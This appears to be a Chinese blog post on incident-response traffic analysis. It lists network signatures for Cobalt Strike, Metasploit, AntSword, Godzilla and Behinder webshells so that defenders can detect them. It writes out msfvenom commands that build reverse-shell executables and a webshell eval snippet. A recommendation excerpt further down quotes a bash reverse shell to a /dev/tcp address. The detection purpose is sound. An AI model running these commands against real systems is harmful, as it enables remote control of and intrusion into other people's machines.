应急响应--流量分析

最新推荐文章于 2025-05-29 18:41:46 发布
最新推荐文章于 2025-05-29 18:41:46 发布
阅读量1.3k 收藏 14
点赞数 31
CC 4.0 BY-SA版权
文章标签: 网络安全 系统安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leaf_lucky/article/details/146165181

(一)Cobalt Strike流量特征分析

1.HTTP特征

源码特征:

在流量中,通过http协议的url路径,在checksum8解密算法计算后,32位的后门得到的结果是92,64位的后门得到的结果是93,该特征符合未魔改Cobalt Strike的流量特征。

public class EchoTest {
  public static long checksum8(String text) {
    if (text.length() < 4) {
      return 0L;
    }
    text = text.replace("/", "");
    long sum = 0L;
    for (int x = 0; x < text.length(); x++) {
      sum += text.charAt(x);
    }
    return sum % 256L;
  }
  public static void main(String[] args) throws Exception {
    System.out.println(checksum8("flJA"));
  }
}

流量特征:

固定的user-agent头:老版本的cobalt strike中user-agent头是固定不变的,可以作为一个特征,新版本的cobalt strike中的user-agent头是会每次都变化的。

例如,在cobalt strike4.8中两个不同的cobalt strike数据包的user-agent头是不同的。

 

特殊的请求特征:

在使用cobalt strike下达指令时,会出现post请求/sumbit.php?id=xxx的特征,该特征可以判断cobalt strike。

魔改后的cobalt strike遗留特征:

即使cobalt strike进行了证书文件的魔改,可以消除数据包的部分特征,但仍有部分特征没有修改,例如该图中是修改了cobalt strike证书文件的数据包情况,但是遗留了GET /cx和POST /q.cgi这两个特征。

工具:https://blog.didierstevens.com/didier-stevens-suite/

 2.HTTPS特征

证书特征:

如果没有修改cobalt strike的证书或者自己手动加载自定义证书,默认的cobalt strike证书可以直接判断出该工具是cobalt strike。

JA3特征:

在数据包的client hello中,数据包有JA3和操作系统有关,每个操作系统都有固定的值,例如我使用的操作系统为windows11

JA3S特征:

在数据包的server hello中,数据包有JA3s和操作系统有关,每个操作系统都有固定的值,例如我使用的操作系统为windows11

(二)MSF的流量特征分析

1.TCP特征

 msfvenom -p windows/shell/reverse_tcp lhost=116.62.152.86 lport=1234 -f exe -o test1.exe

利用明文传输(查看流量包,追踪流选择tcp),都含有MZ头和DOS异常

2.HTTP特征

msfvenom -p windows/meterpreter/reverse_http lhost=10.236.32.154 lport=4445 -f exe -o test.exe

有MZ头和DOS异常(因为都是meterpreter类型)、但是多了请求包和返回包

32位:

请求包:
UA:Mozilla/5.0,
Connection: Keep-Alive
Cache-Control: no-cache
返回包
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Connection: Keep-Alive
Server: Apache
Content-Length: 176732

64位:

请求包:
GET /Host:Cache-Control:no-cache
返回包:
HITP/1.1 200 OK
Content-Type:application/octet-stream
Connection:close
Server: Apache
Content-Length:201820

3.HTTPS特征

msfvenom -p windows/x64/meterpreter/reverse_https lhost=10.236.0.30 lport=4445 -f exe -o test.exe

https的特征是流量中会含有Client Hello和Server Holle这四个包

Client包里面有JA值,Server包里面有JAS值

(三)蚁剑的流量特征

1.User-Agent

请求中的User-Agent值是:antSword/*;也有可能是:Mozilla/5.0 (Windows NT ) AppleWebKit/ (KHTML, like Gecko) Chrome/* Safari/

2.关键字

请求中可以检测到的关键字:“eval””eVAL”

请求体存在@ini_set(“display_errors”, “0”);@set_time_limit(0);(开头可能是菜刀或者是蚁剑)

(四)哥斯拉的流量特征

1.强特征Cookie:

cookie字段,最后一个Cookie的值出现;(尾值出现分号)

2.请求头Accept:

请求中的Accept头是:

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8

3.payload特征

jsp会出现xc,pass字符和Java反射,base64加解码等特征,php,asp则为普通的一句话木马。

4.Connection响应

哥斯拉会响应三次,还有一个地方需要注意的就是webshell连接,所以一般会设置长时间连接,所以connection这里会是keep-alive

5.响应头中的Cache-Control头

响应头中的Cache-Control头是:Cache-Control: no-store, no-cache, must-revalidate

6.响应体的数据

响应体的数据有一定特征,哥斯拉会把一个32位的md5字符串按照一半拆分,分别放在base64编码的数据的前后两部分。整个响应包的结构体征为:md5前十六位+base64+md5后十六位。

(五)冰蝎的流量特征

1.User-agent字段

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)  

Mozilla/5.0 (Windows; U; Windows NT 6.1; en\-US) AppleWebKit/533+ (KHTML, like Gecko) Element Browser/5.0  

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)  

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.37 Edge/16.16299  

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0  

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36  

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)  

Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko  

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0  

Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0  

Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36  

Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko  

Mozilla/7.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Xbox)

2.Content-type:

Content-type:Application/x-www-form-urlencoded

3.Connection字段:

Connection: Keep-Alive(冰蝎默认使用的长连接是为了避免频繁的握手造成的资源丢失)

4.Accept字段

请求头中存在Accept: application/json, text/javascript, /; q=0.01

也有可能Accept: text/html,image/gif, image/jpeg, *; q=.2, /; q=.2

Content-Type: application/octet-stream ******q=0.8

5.端口

冰蝎与webshell建立连接的同时,javaw也与目的主机建立tcp连接,每次连接使用本地端口在49700左右,每连接一次,每建立一次新的连接,端口就依次增加。

6.PHP webshell 中存在固定代码

$post\=Decrypt(file\_get\_contents(“php://input”));  

eval($post);

7.请求头与响应包

有固定的请求头和响应头,请求字节头:dFAXQV1LORcHRQtLRlwMAhwFTAg/M ,响应字节头:TxcWR1NNExZAD0ZaAWMIPAZjH1BFBFtHThcJSlUXWEd

默认时,冰蝎 webshell都有“e45e329feb5d925b” 一串密钥,与冰蝎3.0相同

 

 

leaf_lucky
关注
应急响应(日志/流量)
nigo134的博客
03-25 4816
事件分类 有害程序事件 网络攻击事件 信息破坏事件 事件内容安全事件 设备设施故障事件 灾害性事件 其它事件 应急响应工作流程 准备阶段 应急团队建设 应急方案制定 等级保护测评 检测阶段 判断安全设备告警 判断事件类型 判断事件级别 确定应急方案 抑制阶段 阻断:封禁IP、断开网络连接.隔离失陷主机 排查:排查可疑进程、排查可疑服务、审计各类日志、排查可疑账户、排查可疑文件 根除阶段 修复:系统漏洞.网站漏洞 更新:安全策略、威胁情报 还原:操作系统.业务系统 恢复
应急响应流量分析?你会吗?
qq_59468567的博客
03-22 456
1、如何区分菜刀、蚁剑、冰蝎、哥斯拉WENSHELL特征?(经典问题)​​​​​​​。5、说下服务器被上传webshell处置思路是什么?3、根据设备告警(WEB)如何分析流量?3、说说钓鱼邮件处置实际操作。2、流量检测的设备你了解吗?1、Windows应急响应。2、Linux应急响应。4、如何确认是否误报?
【HW系列】—C2远控服务器(webshell链接工具, metasploit、cobaltstrike)的漏洞特征流量特征
最新发布
2402_84408069的博客
05-29 1467
本文分析了常见渗透工具蚁剑、冰蝎、哥斯拉以及Metasploit、CobaltStrike流量特征。蚁剑流量包含PHP代码片段和特殊参数名,冰蝎采用动态密钥协商和固定Content-Type标识,哥斯拉则带有异常Cookie特征。Metasploit分阶段下载Payload并通过异常端口交互,CobaltStrike具有checksum8路径规则和DNS异常查询特征。检测建议包括监控异常流量模式、分析进程日志,防御策略推荐框架加固和网络防护。本文仅作技术研究,禁止非法使用。
应急响应-流量分析
qq_50765147的博客
01-28 1100
应急响应中,有时需要用到流量分析工具,。当需要看到内部流量的具体情况时,就需要我们对网络通信进行抓包,并对数据包进行过滤分析,最常用的工具是Wireshark。
网络安全应急响应-流量分析技术
Bnessy
03-24 4699
Wireshark全流量分析 1. 时间设置 在Wireshark中看到的时间默认为Seconds Since Beginning of Capture,即时间戳为秒格式,从捕捉开始计时,以后的时间是距离第一个捕获包的时间间隔。 日期和时间(1970-01-01 01:02:03.123456):显示日期和每天的时间-时间格式(年月日,时分秒)。 时间(01:02:03.123456):只显示时间-日期格式(时分秒格式)。 自1970-01-01经过的秒数:格式为1234567890.123456,时间
linux应急响应&流量分析(附环境)
qq_73870170的博客
12-13 1588
linux应急响应
应急响应-MSF流量分析&模式模块&特征提取
SuperherRo的博客
04-13 2314
战后-流量分析-MSF
玄机应急响应哥斯拉4.0-流量分析
Lucker_YYY的博客
09-24 964
ssh查看服务器history得到将/tmp/pam_unix.so复制到了/lib/x86_64-linux-gnu/security/pam_unix.so。将pam_unix.so文件下载下来ida打开分析查看函数pam_sm_authenticate 这个函数是用来控制认证的,pam后门常常放在这里。黑客留下后门的反连的IP和PORT是什么?黑客连接webshell时查询当前shell的权限是什么?黑客连接webshell后执行的第一条命令是什么?黑客通过什么漏洞进入服务器的(提交cve编号)
蓝队应急响应-Linux日志分析及常用命令总结
网络安全
07-12 1409
玄机靶场地址:https://xj.edisec.net/第一章应急响应-Linux日志分析1.有多少IP在爆破主机ssh的root帐号,如果有多个使用","分割2.ssh爆破成功登陆的IP是多少,如果有多个使用","分割 3.爆破用户名字典是什么?如果有多个使用","分割 4.登陆成功的IP共爆破了多少次 5.黑客登陆主机后新建了一个后门用户,用户名是多少在Linux系统下,日志默认存...
精品干货-Linux 应急响应手册-479页.pdf
03-13
此外,应急响应过程和所采取措施的有效性需要经过审查,并且从经验中学习,不断完善应急响应计划。 整个应急响应过程可能还会涉及法律和合规性问题,特别是如果攻击涉及数据泄露,就需要通知受影响的个人并可能需要...
5、应急响应-拒绝服务&钓鱼识别&DDOS压力测试&邮件反制分析&应用日志
m0_65842464的博客
01-27 904
了解和分析应用日志,识别钓鱼邮件并溯源反制,DDOS攻击与CC攻击的测试和防御CC攻击(即“拒绝服务攻击”的一种攻击形式)是一种通过向目标服务器发送大量请求来使其无法正常工作的攻击方式。攻击者通常使用大量的计算机或者僵尸网络来发起攻击,从而使目标服务器的带宽、CPU或内存等资源被耗尽,导致服务器无法正常响应请求。CC攻击是一种常见的网络攻击方式,可以对网站、应用程序、网络服务等造成。DDOS攻击是一种通过向目标服务器或网络发送大量流量或请求来使其无法正常工作的攻击方式。
玄机平台流量特征分析-蚁剑流量分析
2301_76227305的博客
06-20 1001
最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
流量分析与日志溯源的个人理解
qax
12-09 4601
下面是我结合网上论坛以及个人的一些想法针对日志分析溯源的个人理解 现阶段大部分企业都会上日志审计设备,在配上流量分光,还有各类IDS、WAF等设备日志,对安全溯源分析十分方便,但在日常工作中,免不了要直接看服务器相关请求日志的情况,这个时候就需要我们自身具备日志分析的能力了。 一、日志分析流程 1、统计 首先需要对数据进行处理,如请求IP统计,访问地址统计,HTTP状态码统计等,这些数据统计可以使用excel或者python脚本,如果手头有各类工具那就更容易统计了。2、威胁发现 关键字过...
CobaltStrike 流量分析与入侵检测
qq_74806534的博客
10-28 1393
ja3 和 ja3s 分别代表 tls 握手阶段的 client-hello、server-hello 的数据集合计算出的哈希值(md5),相同版本相同系统下指纹相同,该特征与操作系统、cobaltstrike 版本有关,profile 文件无法对其修改。JA3S指纹(Just Another SSL/TLS Signature):它是基于服务器在TLS握手过程中发送的服务器Hello消息中的字段值生成的指纹。JA3指纹和JA3S指纹的生成方法类似,都是通过计算握手消息中的字段值的哈希值来生成唯一的指纹。
Cobalt Strike流量特征分析
weixin_52741673的博客
07-21 8286
cobalt strike流量特征分析
告警流量分析:Cobalt Strike(默认实验文)
soldi_er的博客
10-26 3639
文章目录前言从去除流量特征反推分析流量包200815084549005001_tmp.pcap - 无有用信息200929112751005001_tmp.pcap - 无有用信息流量包协议可疑 IP 地址犯错 - one hour passed201021151312005001_tmp.pcap - 有用信息第一段数据TCP 流所有 description源地址筛选:ip.src == 10.160.161.16源地址筛选:ip.src == 10.150.187.155总结 前言 软件一般都有流量特征
记一次应急响应实战分析-附加应急响应工具包
告白的博客
10-28 2469
0x00 应急响应安全事件的分类 今天带来一篇实战的应急响应干货分享!最清晰的思路,让小白可以独立支撑应急响应! 常见安全事件的分类 数据安全事件:数据泄露,数据破坏,数据篡改 应用安全事件:网站篡改,sql注入,xss攻击等等 系统安全事件:口令破解,系统提权,木马挖矿等 网络安全事件:DDOS,DNS劫持,ARP欺骗等 应急等级:Ⅰ级,Ⅱ级,Ⅲ级,Ⅳ级 预警等级:红色预警,橙色预警,黄色预警,蓝色预警 事件类型:特别重大,重大,较大,一般 0x01 应急响应准备流程: 响应前期: 1.准备阶段:
Cobalt Strike(CS)流量分析
小千安全
04-21 8458
为了识别 Cobalt Strike 生成的 HTTPS 流量,可以收集不同 TLS 实现的 JA3S 值,构建 JA3S 签名库,并结合其他特征和行为进行综合分析和判断。同时,反编译CS的源代码也可以得知,92L对应于x86位的木马,而93L对应于x64位的后门。在 HTTPS 协议的 Client Hello 和 Server Hello 阶段,都包含了 JA3S 值传输过程过程中会有 ja3,这个值在系统上是固定的,win10是一种的 但win11是另一种 他们取决于操作系统。
【电子数据取证】关于CoblatStrike的流量特征取证分析
longxintec的博客
07-20 1175
Stage是可执行文件在运行后会使用http协议向指定服务器下载stage,指定服务器通常是team server,请求http的路径有多个,但不管怎样,路径名都符合checksum8原则,请求的路径的ascii的和与256取余之后的值为92(x86位木马)或者93(64位木马)在对流量的取证过程中,应当先了解各种工具的各种基本特征,才能根据其特征来分析并确定其类型,需要充分了解取证的技巧以及具备充实的知识储备,才能在令人眼花缭乱的数据流中找出关键的证据。为了明确事情的真相,公司决定进一步调查此事。
应急响应-vulntarget-j-01
03-16
### 应急响应中的漏洞目标与配置信息 在应急响应过程中,针对 `vulntarget j 01` 的配置和漏洞目标分析可以分为以下几个方面: #### 1. 环境概述 此题目所描述的是一个中型环境下的应急响应场景[^1]。其核心目的是通过重现攻击路径来帮助应急人员快速定位并确认受害主机中存在的安全漏洞。 #### 2. 攻击路径还原 为了有效还原攻击路径,通常需要关注以下几点: - **日志文件审查**:检查系统日志(如 `/var/log/auth.log`, `/var/log/syslog`),寻找异常登录记录或其他可疑活动。 - **网络连接状态**:利用命令如 `netstat -anp | grep ESTABLISHED` 或者更高级工具(如 Wireshark)捕获实时流量数据。 - **恶意脚本检测**:例如给定的 Bash 脚本可能被用于建立反向 Shell 连接[^3]: ```bash bash -c 'exec bash -i &>/dev/tcp/192.168.138.133/8888 <&1' ``` #### 3. CMS 实战案例解析 根据提供的 Linux 实战题解,在第五章节提到的具体 Flag 值表明该任务涉及到了某种 Web CMS 漏洞利用过程[^2]。此类问题往往源于未及时更新软件版本或者错误的安全配置。 #### 4. 安全加固建议 基于上述发现,可采取如下措施加强防护能力: - 更新所有已知存在风险的应用程序至最新稳定版; - 关闭不必要的服务端口减少暴露面; - 设置强密码策略并启用双因素认证机制; - 对敏感操作实施访问控制列表(ACL),仅允许授权IP地址范围内的请求进入内部网络区域; #### 结论 综上所述,“vulntarget j 01”的主要工作围绕着识别潜在威胁源以及修复相应的弱点展开。这不仅考验技术实力同时也锻炼逻辑思维能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值